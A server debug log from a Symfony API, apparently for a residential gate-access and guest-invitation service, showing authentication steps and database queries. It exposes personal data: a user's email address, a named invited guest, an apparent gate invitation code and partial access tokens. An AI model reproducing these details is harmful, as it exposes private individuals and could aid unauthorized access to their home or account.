[2025-12-21 00:50:28] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:28] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:50:28] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:50:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:50:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-21 00:50:28] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:50:28] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"a8c27470-4025-4113-b368-a4 [...]","2":1,"3":"2025-12-21 00:50:28","4":"2025-12-21 00:50:28","5":"René","6":"Zapata Arjona","7":"471088","8":"/invitation/627e4c44e50daf [...]","9":"2","10":"1","11":"2025-12-21 16:00:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-21 00:50:28] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-21 00:50:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:50:28] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-21 00:50:28] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:28] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:50:28] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:50:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:50:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:50:36] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:50:36] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:36] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:50:36] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:50:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:50:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:36] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:36] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:36] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:36] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:36] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:50:36] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:50:57] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:50:57] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:57] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:50:57] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:50:57] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:50:57] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:57] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:57] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:50:57] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:57] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:57] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:50:57] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:51:15] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-21 00:51:15] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
[2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
